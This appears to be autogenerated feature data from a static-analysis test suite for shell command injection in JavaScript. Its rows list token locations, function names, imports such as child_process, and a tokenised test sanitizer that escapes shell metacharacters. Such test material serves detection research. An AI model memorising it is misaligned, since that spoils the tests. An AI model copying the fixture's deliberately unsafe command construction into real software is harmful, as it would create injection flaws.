autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:6:398:6 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:13:398:15 | '"' | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:13:398:15 | '"' | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:13:398:15 | '"' | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:13:398:15 | '"' | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:398:13:398:15 | '"' | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:9 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:9 | result | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:9 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:9 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:9 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result ... + s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result ... + s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result ... + s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result ... + s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:4:399:25 | result ... + s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:18 | result | stringConcatenatedWith | -endpoint- s.? | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:25 | result + s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:25 | result + s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:25 | result + s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:25 | result + s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:13:399:25 | result + s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:22 | s | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:22 | s | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:22 | s | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:22 | s | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:22 | s | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:22:399:25 | s[i] | stringConcatenatedWith | '' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:24:399:24 | i | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:24:399:24 | i | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:24:399:24 | i | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:24:399:24 | i | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:399:24:399:24 | i | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:402:9:402:14 | result | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:402:9:402:14 | result | contextSurroundingFunctionParameters | (str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:402:9:402:14 | result | enclosingFunctionBody | str s str result i 0 i 2000 i s i undefined s i > s i < s i * s i ? s i [ s i ] s i \| s i \u02da s i $ s i ; s i & s i ( s i ) s i ] s i # s i \\ s i \t s i \n s i ' s i ` s i " result result s i result | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:402:9:402:14 | result | enclosingFunctionName | yetAnohterSanitizer | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:402:9:402:14 | result | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:25 | module. ... itizer3 | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:25 | module. ... itizer3 | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:405:25 | module. ... itizer3 | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:410:1 | module. ... // OK\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:410:1 | module. ... // OK\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:1:410:1 | module. ... // OK\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:8:405:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:8:405:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:405:8:405:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| 